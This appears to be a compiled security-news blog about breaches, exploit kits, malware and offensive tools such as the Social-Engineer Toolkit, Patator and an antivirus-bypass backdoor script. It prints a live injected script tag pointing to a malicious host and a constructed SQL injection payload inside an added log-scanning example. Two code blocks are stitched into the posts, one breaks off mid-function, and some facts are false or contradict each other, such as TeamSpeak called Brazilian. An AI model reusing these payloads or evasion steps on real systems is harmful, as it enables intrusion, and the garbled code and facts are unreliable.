
TeamSpeak Official Forum Hacked! Redirecting Users Into Malicious DotCache Exploit Kit

A serious security breach has compromised the official forum of TeamSpeak. According to sources, hackers gained access to the server and injected a malicious script into the landing page of the official TeamSpeak forum. Expert malware analysts have found that the attack was thoroughly planned in order to infect millions of users by redirecting them to a DotCache exploit kit landing page, as illustrated below.
TeamSpeak is a very famous Brazilian company that offers VoIP software which allows computer users to talk on a chat channel with fellow users, much like a telephone conference call. Users use the TeamSpeak client software to connect to a TeamSpeak server of their choice; from there they can join chat channels and enjoy the VoIP service. It is mostly used by millions of gamers across the globe.
Basically, TeamSpeak can be considered a high-value target, and so did the hacker. Researchers said that the exploit kit landing page is hosted on atvisti.ro, a forum for ATV enthusiasts that has also been compromised. In a statement, well-known malware analyst and security researcher Jerome Segura said that if the Java exploit succeeds, the final payload is loaded. In this particular example, the payload was the ZeroAccess Trojan, which Malwarebytes Anti-Malware detects as Rootkit.0Access. The small relief is that the malware has not yet been spotted in the wild. According to VirusTotal statistics, only 7 of 46 leading antivirus engines detect this type of malware. Just as with TeamSpeak, a few days earlier Kahu Security researchers uncovered a similar compromise on the forum of the Nissan Pathfinder Off Road Association (NPORA); in both cases, JJEncode was used to obfuscate the malicious script. To avoid further infections, the TeamSpeak forum has been informed and, as expected, they have resolved the issue. For a detailed analysis of the malware described above, visit the official Malwarebytes blog post.




Social-Engineer Toolkit (SET) Version 4.0 Codenamed “Balls of Steel” Released



Social Engineer Toolkit, also known as SET, gets another update: Social Engineer Toolkit version 4.0, codenamed “Balls of Steel”, is now officially available for public consumption. In its official blog, TrustedSec, the developer of SET, claims that this version of SET is the most advanced toolkit to date. It is the result of several months of development and brings over 50 new features and a number of enhancements, improvements, rewrites and bug fixes.
Let's talk about some highlights and the major new features of SET 4.0. The Java Applet attack has been completely rewritten and obfuscated with added evasion techniques. All of the payloads have been heavily encrypted, with a number of anti-debugging measures put in place. PyInjector is now available natively in the Java Applet attack and deploys shellcode automatically through a byte-compiled executable. The PowerShell attack vectors now support customized payload selection through config/set_config. A new attack vector has been added, the Dell DRAC Attack Vector (default credential finder). A new Teensy payload has been added from the Offensive-Security crew: the auto-correcting attack vector with DIP switch and SD card, “Peensy”. The web cloner has been completely rewritten in native Python, removing the dependency on wget. The new IE zero-day has been included in the Metasploit Web Attack Vector. The Java Repeater and Java Redirection have been rewritten to be more reliable. Obfuscation has been added to the randomized droppers, including the OSX and Linux payloads.

Full Changelog of The Social-Engineer Toolkit (SET) 4.0:- 

  •  Added a new attack vector to SET called the Dell Drac attack vector under the Fast-Track menu.
  •  Optimized the new attack vector into SET with standard core libraries
  •  Added the source code for pyinjector to the set payloads
  •  Added an optimized and obfuscated binary for pyinjector to the set payloads
  •  Restructured menu systems to support new pyinjector payload for Java Applet Attack
  •  Added new option to SET Java Applet – PyInjector – injects shellcode straight into memory through a byte compiled python executable. Does not require python to be installed on victim
  •  Added base64 encoded to the parameters passed in shellcodexec and pyInjector
  •  Added base64 decode routine in Java Applet using sun.misc.BASE64Decoder – native base64 decoding in Java is the suck
  •  Java Applet redirect has been fixed – was a bug in how dynamic config files were changed
  •  Fixed the UNC embed to work when the flag is set properly in the config file
  •  Fixed the Java Repeater which would not work even if toggled on within the config file
  •  Fixed an operand error when selecting high payloads, it would cause a non harmful error and an additional delay when selecting certain payloads in Java Applet
  •  Added anti-debugging protection to pyinjector
  •  Added anti-debugging protection to SET interactive shell
  •  Added anti-debugging protection to Shellcodeexec
  •  Added virtual entry points and virtualized PE files to pyinjector
  •  Added virtual entry points and virtualized PE files to SET interactive shell
  •  Added virtual entry points and virtualized PE files to Shellcodeexec
  •  Added better obfuscation per generation on SET interactive shell and pyinjector
  •  Redesigned Java Applet which adds heavily obfuscated methods for deploying
  •  Removed Java Applet source code from being public – since redesign of applet, there are techniques used to obfuscate each time that are dynamic, better shelf life for applet
  •  Added a new config option to allow you to select the payloads for the powershell injection attack. By specifying the config options allows you to customize what payload gets delivered via the powershell shellcode injection attack
  •  Added double base64 encoding to make it more fun and better obfuscation per generation
  •  Added update_config() each time SET is loaded, will ensure that all of the updates are always present and in place when launching the toolkit
  •  Rewrote large portions of the Java Applet to be dynamic in nature and place a number of non descriptive things into place
  •  Added better stability to the Java Applet attack, note that the delay between execution is a couple seconds based on the obfuscation techniques in place
  •  Completely obfuscated the MAC and Linux binaries and generate a random name each time for deployment
  •  Fixed a bug that would cause custom imported executables to not always import correctly
  •  Fixed a bug that would cause a number above 16 to throw an invalid options error
  •  Added better cleanup routines for when SET starts to remove old cached information and files
  •  Fixed a bug that caused issues when deploy binaries was turned to off, would cause iterative loop for powershell and crash IE
  •  Centralized more routines into set.options – this will be where all configuration options reside eventually
  •  Added better stability when the Java Applet Repeater is loaded, the page will load properly then execute the applet.
  •  The site cloner has been completely redesigned to use urllib2 instead of wget, long time coming
  •  The cloner file has been cleaned up from a code perspective and efficiency
  •  Added better request handling with the new urllib2 modules for the website cloning
  •  Added user agent string configuration within the SET config and the new urllib2 fetching method
  •  Added a pause when generating Teensy payloads
  •  Added the Offensive-Security “Peensy” multi-attack vector for the Teensy attacks
  •  Added the Microsoft Internet Explorer execCommand Use-After-Free Vulnerability from Metasploit into the Metasploit Browser Exploits Attack vectors
  •  Fixed a bug in cleanup_routine that would cause the metasploit browser exploits to not function properly
  •  Fixed a bug that caused the X10 sniffer and jammer to throw an exception if the folder already existed



To Download The Social-Engineer Toolkit (SET) 4.0 Click Here




Microsoft Issues 'fix it' To Close Internet Explorer 0-day Vulnerability


Over the last few days the whole cyber world has gone through a lot of drama over Internet Explorer's security bug, as researchers unveiled four active exploits of a zero-day vulnerability in the browser. As expected, software giant Microsoft has released an emergency fix for this major security issue. Microsoft released a “fix it” tool for a critical security flaw in most versions of Internet Explorer 6, 7, 8 and 9 that hackers have been exploiting to break into Windows systems. The company said it expects to issue an official patch (MS12-063) for the vulnerability on Friday, Sept. 21. "While we have only seen a few attempts to exploit this issue, impacting an extremely limited number of people, we are taking this proactive step to help ensure Internet Explorer customers are protected and able to safely browse online," said Yunsun Wee, director of Microsoft Trustworthy Computing, in a statement. The zero-day in IE 6-9 is a use-after-free memory corruption vulnerability, similar to a buffer overflow, that would enable an attacker to remotely execute code on a compromised machine. The original exploit payload dropped the PoisonIvy remote access Trojan (RAT) via a corrupted Flash movie file. The latest payload discovered dropped the PlugX RAT via the same corrupted Flash movie, Blasco said. He also said the new exploits are the work of the Chinese hacker group Nitro, the same group behind a pair of Java zero-day exploits disclosed in August.

Blasco also said the new exploits appear to be targeting defense contractors in the United States and India.
Microsoft recommended several workarounds on Tuesday morning before announcing its intention to send out a Fix it:
  • Set the Internet and Local intranet security zone settings to High, which blocks ActiveX Controls and Active Scripting in both zones.
  • Configure IE to prompt the user before running Active Scripting, or disable Active Scripting in both zones.
  • Use Microsoft's Enhanced Mitigation Experience Toolkit (EMET), which provides mitigations as well and would not impact website usability, as the first two options might.
Microsoft also said that IE running on Windows Server 2003, 2008 and 2008 R2 runs in a restricted mode that mitigates the vulnerability. Outlook, Outlook Express and Windows Mail also open HTML messages in a restricted zone, mitigating the vulnerability, but should a user click a link in a message, they could still be vulnerable to exploitation.






BlackHole Exploit Kit 2.0 Released !! (Collection of Latest Exploit Modules)


The BlackHole exploit kit, so far recognized as the most successful exploit kit, bundles a collection of exploits that take advantage of vulnerabilities on the target's machine to download malware and infect the victim. It has now become even more powerful, as the BH developers have unleashed a new version of their exploit toolkit on the net. With BlackHole 2.0 the software has been "rewritten from scratch" to fool antivirus and firewall products, said the unknown developers in a Russian-language release announcement on Pastebin. In their posting they advertise new features such as temporary exploit URLs that are only valid for a few seconds, making them harder to analyse. The other features are also noteworthy and make it a faster exploit kit: for instance, the new version no longer relies on PluginDetect to determine the installed Java version, which speeds up the malware download routine. Because the link to the malicious payload was easily identified by security software earlier, BlackHole 2.0 comes with a feature that allows the customer to choose the link. The creators of the exploit kit claim that this way none of the commercial antivirus solutions is able to detect it. Old exploits that were causing the browser to crash have been removed.
A total of 16 improvements are claimed for BlackHole's administrator panel. It is now faster, statistics are easier to view, and mobile phones and Windows 8 have been added so customers can see precisely what types of devices are infected. The prices for the service are quite competitive; all you need is criminal intent and money. The toolkit can now even be rented for $50 a day and will then run on a server owned by the BlackHole team. The annual licence fee for criminals who use their own servers is $1,500. Detailed information about BH 2.0 can be found here.






'BackDoor.Wirenet.1' Trojan Stealing Passwords From Mac & Linux Based Systems



A Russian antivirus company named Dr.Web has spotted a piece of malware that, unusually, targets Macs and Linux-based systems and is causing a world of trouble for those in its path. The newly found malware, dubbed 'BackDoor.Wirenet.1', apparently provides its masters with a backdoor into infected systems. It is also capable of stealing passwords stored in browsers such as Chrome, Chromium, Firefox and Opera. Furthermore, it is able to obtain passwords from popular applications including SeaMonkey, Pidgin and Thunderbird. Even if you don't use any of the software mentioned above, you are still in danger, as a keylogger is bundled in the payload. Wirenet.1 installs itself into the user's home directory under the name WIFIADAPT.

There are some steps that can be taken right away if you think you could be infected. Dr.Web is quick to point out that its antivirus software will keep you protected. Another option is to simply disable communication with the control server used by the code's author; in this case, blocking communication with the IP address 212.7.208.65 should do the trick.

Mac users have faced such attacks before: the Mac Trojan OSX.SabPub spread through Java exploits, in 2011 the OSX/Revir-B Trojan was installed behind a PDF and gave hackers remote access to Mac computers, and, besides Revir-B, the Linux Tsunami Trojan called "Kaiten" also targeted Mac OS users in 2011. Another piece of malware named "DevilRobber" also made Mac users its victims by stealing their personal information.





BackTrack 5 R3 Released & Available To Download


In our last post about BackTrack we mentioned the release date of the long-awaited BT 5 Release 3. Now the countdown is finally over. The time has come to refresh our security tool arsenal: BackTrack 5 R3 has been released worldwide. The first BT5 R3 preview was released at BlackHat 2012 Las Vegas for the enjoyment of conference attendees. The main aim of that pre-release was to collect the last bug reports and tool suggestions from the BH / Defcon crowds. This final release mainly focuses on bug fixes as well as the addition of over 60 new tools. A whole new tool category was populated, “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.
As usual, KDE and GNOME 32/64-bit ISOs have been released, together with a single VMware image (GNOME, 32-bit).
We would also like to remind you that the first release candidate (R1) of BackTrack 5 was released in August last year, and in March this year we got the second release candidate (R2) of BT 5.
For those requiring other VM flavours of BackTrack, or wanting to build their own VMware image, instructions can be found in the BackTrack Wiki. Direct ISO downloads will be available once all the HTTP mirrors have synced, but you can already download BackTrack 5 R3 via torrent from the links below.




Duqu Mystery Finally Solved By Researcher at Kaspersky Lab


After so much drama, the deep mystery of Duqu has finally been solved. Researchers at Kaspersky Lab have found that this dangerous Stuxnet relative was written in a custom object-oriented dialect of C called “OO C”. The mystery began earlier this month, when Kaspersky researchers struggled to determine what programming language had been used to develop Duqu, so they asked the programming community for help in finding out the truth. They got a wild response: 200 comments and 60+ e-mail messages with suggestions about possible languages and frameworks that could have been used to generate the Duqu Framework code.
Let us review the most popular suggestions:-
  • Variants of LISP
  • Forth
  • Erlang
  • Google Go
  • Delphi
  • OO C
  • Old compilers for C++ and other languages
There are two main possibilities: the code was either written using a custom OO C framework, or it was entirely written in OO C manually, without any language extensions. No matter which of these two variants is true, the implications are impressive. As Kaspersky's Igor Soumenkov pointed out, the payload DLL contains 95 Kbytes of event-driven code written in OO C, a language that has no automatic memory management or safe pointers. “This kind of programming is more commonly found in complex ‘civil’ software projects, rather than contemporary malware. Additionally, the whole event-driven architecture must have been developed as a part of the Duqu code or its OOC extension,” said Mr Soumenkov.
This leads to the assumption that the developers are old school and don't trust C++, which is why they relied on C. Another reason for using OO C is that back in the good old days it was more portable than C++. Duqu was created by a professional team that wrote the framework based on old code. To read the full story, click here.



Armitage (Cyber Attack Management Tool For Metasploit) Ver 01.19.12 Released



We have discussed Armitage a couple of times before. It is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don't use Metasploit every day. If you are new to Metasploit and want to learn its advanced features, Armitage can only help. Now the author has released an updated version: Armitage version 01.19.12!

Official Change Log For Armitage 01.19.12:- 

  • Data export now includes a sessions file. This lists all of the Metasploit sessions you had in your database. There’s some neat data here including which exploit was used, which payload, start time, and close time. You can calculate how much time you spent on your client’s boxes. Cool stuff.
  • Fixed a potential dead-lock caused by mouse enter/exit events firing code that required a lock. Nice landmine to defuse.
  • Fixed a weird condition with d-server detection. Sometimes (rarely) Armitage wouldn’t detect the d-server even when it’s present.
  • Added check to d-server allowing one lock per/client. Client won’t reobtain a lock until it lets it go. This prevents you from opening two shell tabs for a shell session in team mode.
  • Fixed an infinite loop condition when some Windows shell commands would return output with no newlines (e.g., net stop [some service]). Thanks Jesse for pointing me to this one.
  • Data export now includes a timeline file. This file documents all of the major engagement events seen by Armitage. Included with each of these events is the source ip of the attack system and the user who carried out the action (when teaming is setup).
  • Data export now exports timestamps with current timezone (not GMT)
  • Fixed a nasty bug that’s been with Armitage since the beginning! I wasn’t freeing edges properly in the graph view. If you had pivots setup in graph view and used Armitage long enough–eventually Armitage would slow down until the program became unusable. At least it’s fixed now.
  • Adjusted the d-server state identity hash combination algorithm to better avoid collisions.
  • Armitage now displays ‘shell session’ below a host if the host info is just the Windows shell banner. 

The latest Armitage is installed with Metasploit 4.1.0+. If you want to use Armitage as a remote Metasploit client, then click here.





Patator -A Multi-Purpose Brute-Forcer


Earlier we have talked several times about brute-forcing tools such as THC-Hydra, Cain & Abel, RainbowCrack and many more. Today we will discuss Patator, a multi-purpose brute-forcer written in Python with a modular design and flexible usage. It can be modified and rewritten as our environment requires. Patator is licensed under the GPLv2.

Modules Supported:-
ftp_login : Brute-force FTP
ssh_login : Brute-force SSH
telnet_login : Brute-force Telnet
smtp_login : Brute-force SMTP
smtp_vrfy : Enumerate valid users using the SMTP VRFY command
smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
http_fuzz : Brute-force HTTP/HTTPS
pop_passd : Brute-force poppassd (not POP3)
ldap_login : Brute-force LDAP
smb_login : Brute-force SMB
mssql_login : Brute-force MSSQL
oracle_login : Brute-force Oracle
mysql_login : Brute-force MySQL
pgsql_login : Brute-force PostgreSQL
vnc_login : Brute-force VNC
dns_forward : Forward lookup subdomains
dns_reverse : Reverse lookup subnets
snmp_login : Brute-force SNMPv1/2 and SNMPv3
unzip_pass : Brute-force the password of encrypted ZIP files
keystore_pass : Brute-force the password of Java keystore files

Features of Patator:-
  • No false negatives, as it is the user that decides what results to ignore based on:
      • status code of response
      • size of response
      • matching string or regex in response data
  • Modular design
      • not limited to network modules (eg. the unzip_pass module)
      • not limited to brute-forcing (eg. remote exploit testing, or vulnerable version probing)
  • Interactive runtime
      • show verbose progress
      • pause/unpause execution
      • increase/decrease verbosity
      • add new actions & conditions during runtime in order to exclude more types of response from showing
  • Use persistent connections (ie. will test several passwords until the server disconnects)
  • Multi-threaded
  • Flexible user input
      • Any part of a payload is fuzzable:
          • use FILE[0-9] keywords to iterate on a file
          • use COMBO[0-9] keywords to iterate on the combo entries of a file
          • use NET[0-9] keywords to iterate on every host of a network subnet

To Download Patator Click Here 




Your Car At Risk, Hackers Can Attack Modern Cars Remotely


Hackers could attack modern cars without even touching them. As new car models roll off the line loaded with complex IT systems running millions of lines of software code, it has become evident that hacking a car to gain external control of it is possible. While actual cases in the field are rare, the industry is moving to secure its systems and prevent cars from becoming a major target, said security researcher Brian Jackson. In the exclusive report he said: An unsuspecting driver opens her door and steps into her new car, placing her smartphone on the dash as it connects with the in-car infotainment system for hands-free features. Little does she know there's a Trojan virus on her phone just waiting to be connected to a car, and it executes malicious code on the vehicle's embedded software. Suddenly a hacker has the ability to track her car, unlock the doors, or even control the climate controls and speaker volume.
It sounds like a scene out of the next James Bond film, but the above scenario could be a reality today. As auto makers look to woo consumers with snazzy in-car technology features, they are also opening up personal vehicles to the underground community of hackers that have long targeted computer users. In-car IT systems such as Ford's Sync or General Motor's OnStar could be opening up exploits that allow hackers to take control of your car without even laying hands on it.
While complex in-car IT systems are so new that actual car hacking cases in the field are virtually non-existent, researchers have demonstrated it's possible. But investigations into car hacking by police may be impossible at this point because of a lack of forensics capability to detect malware. All the more reason for security vendors like McAfee, now a division of Intel Corp., to push car manufacturers to pay serious attention to security.
“It shouldn't be the responsibility of the consumers to have to secure these systems,” says Tim Fulkerson, senior director of marketing at McAfee embedded security group. “Just as manufacturers have built in seat belts and air bags, now that they're moving to software innovation, they need to bring software security into these vehicles.”
Best known for its PC antivirus software, McAfee is now working with car makers to build systems secure enough that consumers won't end up buying virus scan software for their ride. When it comes to car makers and securing IT systems, Fulkerson says it “is certainly not their area of expertise.”
Perhaps that's why a team of car-hacking researchers from the University of Washington and the University of California at San Diego have had so much success. Dubbed the Center for Automotive Embedded Systems Security (CAESS), the team demonstrated in May 2010 how a criminal with physical access to a car could implant malware. Then in August 2011, the team showed an external car hacking attack could be mounted through various paths including Bluetooth and cellular radio.
One such attack was executed after the researchers reverse-engineered a car's telematics operating system and found the program responsible for handling Bluetooth functions. From there, they planted a Trojan horse (a piece of malicious software) on an HTC Dream smartphone that monitors for new Bluetooth connections and if it finds a telematics unit, sends the payload.
Researchers were also able to use special hardware to “sniff” the MAC address of the Bluetooth connection needed for pairing new devices with the telematics unit. After cracking the password through brute force, or machine-assisted repeat attempts, the Trojan could be uploaded from a device in the attacker's hands.
But seeing such an attack executed in the wild today is unlikely, according to Patrick Neal, a program coordinator for crime and intelligence analysis at the B.C. Institute of Technology (BCIT). He had his students explore car hacking methods identified by the CAESS group and others. 





Script To Bypass Antivirus & Firewall By Security Labs



Security Labs experts from India have released an automated antivirus and firewall bypass script. It is a modified and stable version made to work with the BackTrack 5 distro. In order to compile the generated payload, the MinGW32 GCC must be installed on your system.

Method:-
apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

After the installation you need to move the shell script (Vanish.sh; the download link is given below) to the default Metasploit folder (/pentest/exploits/framework) and execute it. Recommended seed number = 7000 and number of encodes = 14.
Note: By default the script generates a reverse TCP payload, but you can change this with some modifications to the script [vanish.sh]. The virus scan report of the backdoor shows that it is almost undetectable by most antivirus programs.

To Download The Script Click Here

Security Labs Experts also released a pastebin. Rest of other information can be found from that release. 




SQL Injection Vulnerability, More Than 4000 Websites Under Risk


A mass SQL injection attack is being performed based on search engine (mainly Google) queries, also known as dorks. The output shows that more than 4,000 websites have been infected through this vulnerability. When it was first detected the list of infected websites was small; later it grew. According to a SANS report, thousands of sites have already been compromised in this attack.

Here is a demo:- 
"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>
Typically it is inserted into several tables.  

From the information gathered so far it looks targeted at ASP, IIS and MSSQL backends, but that is just speculation. Impacted sites appear to be running Microsoft Internet Information Services (IIS) or Microsoft SQL web servers, and are using software from ASP.NET or ColdFusion. Visitors to hacked sites, which are vulnerable because they haven't fully patched their applications and the databases that support them, are being redirected to pages trying to push rogue antivirus programs or another payload.
"The hex will show in the IIS log files, so monitor those," SANS handler Mark Hofman wrote later. "Make sure that applications only have the access they require, so if the page does not need to update a (database), then use an account that can only read."

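Hofman's advice to watch the IIS logs for the hex can be turned into a small check. The Python below is an added example, not part of the SANS diary or of this post: it parses IIS W3C log lines, decodes the long 0x... literals such injections carry, and flags requests whose decoded content holds SQL keywords or a script tag. The field order, the table and column names and the log lines are constructed assumptions.

```python
import re
import urllib.parse
from typing import Dict, List

# Assumed W3C field order for the constructed lines below. A real IIS log states
# its own order in a "#Fields:" header line; read that instead of hard-coding.
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status"]

# Long hex literals are the signature Hofman refers to; short values such as a
# colour code (0xff0000) fall under the length floor and are ignored.
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{40,})")
SQL_HINTS = re.compile(r"\b(declare|cast|exec|update|set)\b", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<script[^>]*src=", re.IGNORECASE)

# Constructed: the SQL a hex blob would decode to, appending the injected tag
# quoted in the post to a column. Table and column names are invented.
INJECTED_SQL = ("update products set descr=descr+"
                "'\"></title><script src=\"hXXp://lilupophilupop.com/sl.php\"></script>'")

# Constructed log lines: one injection attempt, one normal request, and one
# carrying a short hex value that must not be flagged.
SAMPLE_LOG = [
    "2011-12-01 10:15:22 10.0.0.5 GET /catalog/item.asp "
    "id=12';dEcLaRe%20@s%20varchar(4000)%20set%20@s=cast(0x"
    + INJECTED_SQL.encode().hex()
    + "%20as%20varchar(4000));exec(@s);-- 80 - 203.0.113.7 Mozilla/4.0 200",
    "2011-12-01 10:15:23 10.0.0.5 GET /catalog/item.asp id=13 80 - 198.51.100.4 Mozilla/4.0 200",
    "2011-12-01 10:15:24 10.0.0.5 GET /catalog/item.asp id=5&color=0xff0000 80 - 198.51.100.9 Mozilla/4.0 200",
]


def parse_line(line: str) -> Dict[str, str]:
    """Split one space-separated W3C log line into a field dict."""
    return dict(zip(FIELDS, line.split(" ")))


def decode_hex_literals(text: str) -> List[str]:
    """Decode every long 0x... literal, accepting varchar (8-bit) and nvarchar (UTF-16LE) casts."""
    decoded = []
    for match in HEX_LITERAL.finditer(text):
        hexstr = match.group(1)
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]  # tolerate a truncated trailing nibble
        raw = bytes.fromhex(hexstr)
        if len(raw) >= 2 and not any(raw[1::2]):
            decoded.append(raw.decode("utf-16-le", errors="replace"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


def analyse(line: str) -> Dict[str, object]:
    """Return the client, the requested page, and the reasons (if any) the line looks like this campaign."""
    rec = parse_line(line)
    query = urllib.parse.unquote_plus(rec.get("cs-uri-query", ""))
    reasons = []
    if HEX_LITERAL.search(query) and SQL_HINTS.search(query):
        reasons.append("sql-keyword-with-long-hex-literal")
    decoded = decode_hex_literals(query)
    if any(SQL_HINTS.search(d) for d in decoded):
        reasons.append("decoded-hex-contains-sql")
    if any(SCRIPT_TAG.search(d) for d in decoded):
        reasons.append("decoded-hex-contains-script-tag")
    return {"client": rec.get("c-ip"), "stem": rec.get("cs-uri-stem"),
            "reasons": reasons, "decoded": decoded}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Keep only the lines that triggered at least one reason."""
    return [hit for hit in map(analyse, lines) if hit["reasons"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], hit["stem"], hit["reasons"])
        for text in hit["decoded"]:
            print("  decoded:", text)
```

Pointing `scan()` at real log lines means reading the `#Fields:` header first and building `FIELDS` from it, since the order varies between servers.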



0-Day Vulnerability in Yahoo Messenger, An Attacker Can Change The Status Update Remotely


A zero-day exploit has been found in Yahoo Messenger that allows attackers to change a user's status message remotely. Version 11.x of the Messenger client (including the freshly released 11.5.0.152-us) is affected by this 0-day vulnerability. The status message change occurs when an attacker simulates sending a file to a user. This action manipulates the $InlineAction parameter (responsible for the way the Messenger form displays the accept or deny options for the transfer) in order to load an iFrame which, when loaded, swaps the status message for the attacker's custom text, which may include a dubious link. The iFrame is sent as a regular message from another Yahoo Instant Messenger user, even if that user is not in the victim's contact list. In other words, the exploit delivers its payload when the attacker simulates sending a file to the user: the bogus file tricks Messenger into loading an iFrame that then swaps the status message for whatever garbage the attacker wants to load, including a potentially "dubious" link, as Bitdefender describes it.

  • Why is it so dangerous?
Status messages are highly efficient in terms of click-through rate, as they address a small group of friends. Chances are that, once displayed, they will be clicked by most contacts who see them. One scenario: the victim's status message is swapped with an attention-getting text that points to a page hosting a zero-day exploit targeting the IE browser, the locally installed Java or Flash environments or even a PDF bug, to mention only a few. Whenever a contact clicks on the victim’s status message, chances are they get infected without even knowing it. All this time, the victim is unaware that their status message has been hijacked.
Another lucrative approach to changed status messages is affiliate marketing (ie: sites that pay affiliates for visits or purchases through a custom link). Someone can easily set up an affiliate account, generate custom links for products in campaign, then massively target vulnerable YIM victims to change their status with the affiliate link. Then, they just wait for the contact-generated traffic to kick in. There are actually a couple of services that pay YIM users to change their status with custom links as part of their business.


  • Who is Safe?
You are running a Bitdefender security solution (Bitdefender Antivirus Plus, Bitdefender Internet Security or Bitdefender Total Security). We detect this threat via the HTTP scanner and block it before it reaches the Messenger application.
You have Yahoo Messenger set to “ignore anyone who is not in your Yahoo! Contacts” (which is off by default).


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Social Engineer Toolkit (SET) Version 2.4.2 Released



Social Engineer Toolkit has been updated! We now have the Social Engineer Toolkit version 2.4.2

Brief About SET:-
The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.

Official Change Log For Social Engineer Toolkit v2.4.2:-


  • Fixed a bug in multiattack vector where specifying java applet attack and shellcode exec would not properly inject alphanumeric shellcode into the applet
  • Restructured multiattack vector to properly clone, prep payload delivery, then inject alphanumeric shellcode
  • Added better handling around multiple attack vectors
  • Fixed a bug that caused msfvenom to bomb out if path was /opt/framework3/msf3 versus /opt/framework/msf3
  • Added better handling around multiattack in Social Engineer Toolkit
  • Fixed a bug with self signed certificates would continue to show Microsoft versus what you sign it with
  • Changed java applet to load and render at bottom of body versus in head. Page should now load with Java Applet appearing
  • Fixed a bug where Java Repeater would not load properly when executed due to an incorrect loop within cloner.py
  • Added the ability to use filename for import versus directory
  • Added the ability to import index.html files versus just the folder on the custom import feature


To Download Social Engineer Toolkit v2.4.2 Click Here




Son of Flynn (Social Engineer Toolkit v2.2) Released



Social Engineer Toolkit has been updated! This release is named “Son of Flynn”. We now have the Social Engineer Toolkit version 2.2. The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
Official Change Log for Social Engineer Toolkit v2.2:-
* Added better handling when generating your own legitimate certificate and ensure proper import into SET
* Adjusted java repeater time to have a little more delay, seems to be more reliable and stable if that occurs.
* Removed the check from the main launch of SET for pymssql and only added it when the fast-track menu was specified
* Removed the derbycon posting since it already happened. When we get closer I’ll re-add it back in with detailed information
* Removed old files in the java applet attack that were not needed.
* Added better granularity checking the Java Applet attack when the shellcode exec or normal attacks were being specified.
* Fixed a bug that caused infectious media to bomb out if shellcodeexec was specified as a payload
* Added a legal disclaimer for first initial use of SET that it must be used for lawful purposes only and never malicious intent
* Added improved stability of the java applet attack through better payload detect/selection
* Fixed a bug with shellcodeexec and creating a payload and listener through SET, it would throw an exception, it now exports shellcodeexec properly and exports alphanumeric shellcode
* Added new config check inside core.py, will return value of config, easier..will gradually replace all config checks with this
* Fixed an issue that would cause AUTO_REDIRECT=OFF to still continue to redirect. This was caused from a rewrite of the applet and the same parameters not being filtered properly
* Added more customizing options to RATTE. Now you can specify a custom filename RATTE uses for evading local firewalls. So you can deploy RATTE as readme.pdf.exe and it will run as iexplore.exe to bypass local firewalls. You can also specify whether RATTE should be persistent or not. For testing network firewalls you won’t need a persistent one. Doing a penetration test you may choose a persistent configuration.
* Fixed a bug in RATTE which could break connection to Server. RATTE now runs much more stable and can bypass high end network firewalls much more reliable.
* Added a new config option called POWERSHELL_INJECTION, this uses the technique discovered by Matthew Graeber which injects shellcode directly into memory through powershell
* Added a new teensy powershell attack leveraging Matthew Graebers attack vector.
* Rehauled the Java Applet attack to incorporate the powershell injection technique; it’s still experimental, so it will remain OFF in the config by default. The applet will now detect if PowerShell is installed, and if so, use the shellcode deployment method to gain memory execution without touching disk through PowerShell.
* Fixed a bug that would cause mssql bruter to error if powershell injection was enabled or other attack vectors

To Download SET 2.2 Click Here




Flashback Trojan Targeting Mac OS X in VMware Fusion

Underscoring the growing sophistication of Mac-based malware, a trojan preying on OS X users has adopted several stealth techniques since it was discovered last month.
Updates to the Flashback trojan, which gets installed by disguising itself as an Adobe Flash update, now prevent the malware from running on Macs that use VMware Fusion. Such virtual machine software is routinely used by security researchers to test the behavior of a malware sample because it's easier to delete a virtual instance when they're finished than it is to wipe the hard drive clean and reinstall the operating system.
According to the Mac Security Blog:-
The latest version, Flashback.D, has gotten a bit sneakier. First, it checks to see if the user is running Mac OS X in VMware Fusion. If so, it does not execute. It does this because many malware researchers test malware in virtual machines, rather than infect full installations, as it is easier to delete them and start over with clean copies. This means that security researchers analyzing and looking for this malware need to be running regular Macs.
Next, the installer for the malware downloads the payload when running the postinstall script.

Finally, it no longer installs the easy-to-spot ~/Library/Preferences/Preferences.dylib. Instead, it installs the backdoor inside Safari, and does so in two ways. It adds information to Safari’s info.plist file, with the location of the backdoor, and it adds the actual backdoor module at /Applications/Safari.app/Contents/Resources/UnHackMeBuild.


Even if a user removes the above file (UnHackMeBuild), they need to edit Safari’s info.plist file; if not, Safari will look for the backdoor on launch, and, if it is not found, Safari will quit.

-News Source (Intego Blog, The Register)
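The Intego write-up quoted above gives two host-based indicators for Flashback.D on Safari: a module at /Applications/Safari.app/Contents/Resources/UnHackMeBuild and a reference to it written into Safari's Info.plist, with the warning that removing the file alone leaves Safari unable to launch. The following script is an added example, not code from Intego or this blog, that checks both indicators together so the three states (infected, file removed but plist still pointing at it, clean) are told apart. The post does not say which Info.plist key the malware wrote, so the check walks every string value in the plist rather than looking up one key; the LSEnvironment/DYLD_INSERT_LIBRARIES entry in the constructed sample is an assumption for the demo, chosen because it is one documented way to make an app bundle load a library at launch.

```python
import os
import plistlib
from typing import Iterator, List, Tuple

# Indicators named in the Intego write-up quoted above.
BACKDOOR_MODULE = "/Applications/Safari.app/Contents/Resources/UnHackMeBuild"
SAFARI_INFO_PLIST = "/Applications/Safari.app/Contents/Info.plist"


def walk_strings(node, path: str = "") -> Iterator[Tuple[str, str]]:
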